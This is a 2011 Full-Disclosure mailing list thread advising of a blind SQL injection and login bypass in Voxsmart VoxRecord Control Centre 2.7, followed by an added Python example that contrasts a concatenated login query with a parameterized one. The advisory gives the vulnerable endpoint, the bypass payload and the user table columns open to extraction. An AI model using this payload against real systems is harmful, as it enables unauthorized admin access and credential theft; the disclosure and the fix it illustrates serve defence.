Re: [Full-disclosure] Voxsmart VoxRecord Control Centre - Blind SQLi and auth. bypass

2011-12-02 Thread Piotr Duszynski
Small correction regarding the time line of this disclosure:

[Time-line]
14/11/2011 - Vendor notified
2/12/2011 - Vendor response
??? - Vendor patch release
30/11/2011 - Public disclosure

Cheers, @drk1wi

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Voxsmart VoxRecord Control Centre - Blind SQLi and auth. bypass

2011-12-02 Thread Michele Orru
Correction or not correction, this VoxSmart tool just sucks.
 How come they are vulnerable to auth bypass with or 1=1--???
 Hey, we're in 2012 (almost)...wake up

 ahaha

 Cheers
 antisnatchor

On Fri, Dec 2, 2011 at 10:58 AM, Piotr Duszynski pi...@duszynski.eu wrote:
 Small correction regarding the time line of this disclosure:

 [Time-line]
 14/11/2011 - Vendor notified
 2/12/2011 - Vendor response
 ??? - Vendor patch release
 30/11/2011 - Public disclosure

 Cheers, @drk1wi




-- 
/antisnatchor



[Full-disclosure] Voxsmart VoxRecord Control Centre - Blind SQLi and auth. bypass

2011-11-30 Thread Piotr Duszynski
===
VoxRecord Control Centre - version 2.7 Blind SQLi and auth. bypass
===

Affected Software : Voxsmart - VoxRecord Control Centre v. 2.7
Severity  : Critical
Local/Remote  : Remote
Author: Piotr Duszynski @drk1wi

[Summary]

A blind SQLi exists in the /vcc/login.php login page. This can be used
either for authentication bypass (admin privileges gained)
or login:pass extraction from the 'voxsuser' database table.

[Vulnerability Details]

HTTP POST :/vcc/login.php
admin_un=adm[ BLIND SQL INJECTION]&admin_pw=adddm

- Authentication bypass:
set admin_un to admin'%20or%201%3d1--

- Blind SQLi data extraction:
'voxsuser' table columns
+-------+----+----------+----------+-----------+----------+
| email | id | is_loged | password | user_type | username |
+-------+----+----------+----------+-----------+----------+

[Time-line]

1/10/2011  - Vendor notified
???        - Vendor response
???        - Vendor patch release
30/11/2011 - Public disclosure


Cheers,
@drk1wi
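
Added example, not part of the original advisory and not Voxsmart's code: it shows why the admin_un value from the advisory bypasses a login check that builds its SQL by string concatenation, and why the same input fails once the values are bound as parameters. The table contents, the query text, the function names and the use of SQLite are assumptions made for illustration.

```python
import sqlite3
from urllib.parse import parse_qs

def make_db():
    """Constructed stand-in for the 'voxsuser' table (made-up row)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE voxsuser (id INTEGER PRIMARY KEY, "
               "username TEXT, password TEXT, user_type TEXT)")
    db.execute("INSERT INTO voxsuser (username, password, user_type) "
               "VALUES ('admin', 'constructed-secret', 'admin')")
    return db

def parse_login(body):
    """Decode the two POST fields named in the advisory."""
    fields = parse_qs(body, keep_blank_values=True)
    return fields["admin_un"][0], fields["admin_pw"][0]

def login_concatenated(db, admin_un, admin_pw):
    """Assumed vulnerable pattern: input becomes part of the SQL text."""
    sql = ("SELECT username FROM voxsuser WHERE username = '" + admin_un +
           "' AND password = '" + admin_pw + "'")
    row = db.execute(sql).fetchone()
    return row[0] if row else None

def login_parameterized(db, admin_un, admin_pw):
    """Hardened form: values are bound and never parsed as SQL."""
    # Plaintext comparison only keeps the example short; password
    # hashing is a separate fix.
    row = db.execute(
        "SELECT username FROM voxsuser WHERE username = ? AND password = ?",
        (admin_un, admin_pw)).fetchone()
    return row[0] if row else None

if __name__ == "__main__":
    db = make_db()
    # POST body as given in the advisory, with the bypass value in admin_un.
    un, pw = parse_login("admin_un=admin'%20or%201%3d1--&admin_pw=adddm")
    print("decoded admin_un:", un)
    print("concatenated :", login_concatenated(db, un, pw))
    print("parameterized:", login_parameterized(db, un, pw))
```

In the concatenated query the quote closes the string literal and "--" comments out the password test, so the WHERE clause is true for every row; with bound parameters the whole value is compared as a username and matches nothing.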
